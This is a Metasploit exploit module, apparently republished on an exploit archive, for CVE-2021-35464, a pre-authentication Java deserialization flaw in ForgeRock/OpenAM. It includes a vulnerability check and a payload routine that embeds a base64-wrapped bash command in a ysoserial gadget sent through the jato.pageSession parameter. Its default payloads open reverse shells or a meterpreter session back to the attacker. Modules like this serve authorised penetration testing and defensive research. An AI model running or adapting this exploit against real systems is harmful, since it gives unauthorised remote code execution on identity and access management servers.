ForgeRock / OpenAM Jato Java Deserialization

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'ForgeRock / OpenAM Jato Java Deserialization',  
'Description' => %q{  
This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and  
access management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s  
implementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a  
vulnerable endpoint. Successful exploitation yields code execution on the target system as the service user.  
  
This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus  
is susceptible to the same issue.  
},  
'Author' => [  
'Michael Stepankin', # Original Discovery and PoC  
'bwatters-r7', # Msf module  
'Spencer McIntyre', # All of the Help  
'jheysel-r7' # Check Method  
],  
'References' => [  
['CVE', '2021-35464'],  
['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'],  
['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244']  
],  
'DisclosureDate' => '2021-06-29',  
'License' => MSF_LICENSE,  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],  
'Privileged' => false,  
'Targets' => [  
[  
'Unix Command',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_python_ssl'  
}  
}  
],  
[  
'Linux Dropper',  
{  
'Platform' => 'linux',  
'Arch' => [ARCH_X86, ARCH_X64],  
'Type' => :linux_dropper,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'  
}  
}  
]  
],  
'DefaultTarget' => 1,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
register_options([  
Opt::RPORT(8080),  
OptString.new('TARGETURI', [true, 'Base path', '/openam'])  
])  
end  
  
def check  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),  
'vars_post' => {  
'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))  
}  
)  
if res.nil?  
CheckCode::Unknown("The target server didn't respond!")  
elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')  
CheckCode::Appears  
else  
CheckCode::Safe  
end  
end  
  
def execute_command(cmd, _opts = {})  
cmd_encapsulated = "bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash"  
ysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none')  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),  
'vars_post' => {  
'jato.pageSession' => Base64.urlsafe_encode64("\x00" + ysoserial_payload)  
}  
)  
unless res && res.code == 302  
fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")  
end  
print_good("Successfully executed command: #{cmd}")  
end  
  
def exploit  
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")  
case target['Type']  
when :unix_cmd  
execute_command(payload.encoded)  
when :linux_dropper  
execute_cmdstager  
end  
end  
end  
`